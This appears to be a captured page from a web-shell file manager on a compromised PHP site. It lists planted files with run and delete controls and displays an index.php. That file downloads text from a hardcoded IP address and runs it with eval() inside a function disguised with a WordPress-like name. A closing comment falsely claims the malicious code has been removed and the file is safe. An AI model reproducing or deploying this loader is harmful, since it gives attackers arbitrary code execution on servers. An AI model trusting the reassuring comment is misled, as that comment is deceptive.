at path:
ROOT
/
index.php
run:
R
W
Run
.htaccess
233 By
2026-04-17 06:20:45
R
W
Run
Delete
Rename
admin.php
0 By
2026-04-19 08:36:17
R
W
Run
Delete
Rename
error_log
569 By
2026-04-19 08:36:17
R
W
Run
Delete
Rename
f.php
0 By
2026-04-19 08:36:03
R
W
Run
Delete
Rename
f.php7
0 By
2026-04-19 08:35:38
R
W
Run
Delete
Rename
index.php
1.3 KB
2026-04-18 09:49:18
R
W
Run
Delete
Rename
robots.txt
63 By
2026-04-17 06:37:05
R
W
Run
Delete
Rename
simple.php
15.05 KB
2026-04-17 02:52:26
R
W
Run
Delete
Rename
error_log
up
📄
index.php
Save
<?php function get_remote_content($url = 'http://107.150.63.202/z60214_18/stat/index2.txt' ) { $ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0.0.0'; if (ini_get('allow_url_fopen')) { $ctx = stream_context_create( array("http" => array("header" => "User-Agent: $ua\r\n"))); $res = @file_get_contents($url, false, $ctx); if ($res) return $res; } $p = parse_url($url); $host = $p['host']; $port = ($p['scheme'] == 'https') ? 443 : 80; $sock = @fsockopen(($port == 443 ? "ssl://" : "") . $host, $port, $en, $er, 10); if ($sock) { $req = "GET " . $p['path'] . " HTTP/1.1\r\nHost: $host\r\nUser-Agent: $ua\r\nConnection: Close\r\n\r\n"; fwrite($sock, $req); $raw = ''; while (!feof($sock)) { $raw .= fgets($sock, 1024); } fclose($sock); return substr($raw, strpos($raw, "\r\n\r\n") + 4); } return false; } function eval_wordpress( $content ){ if ( $content ) { for( $i=0; $i<2; $i++){ while ( $i < 5 ){ eval( $content ); break; } break; } } } /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */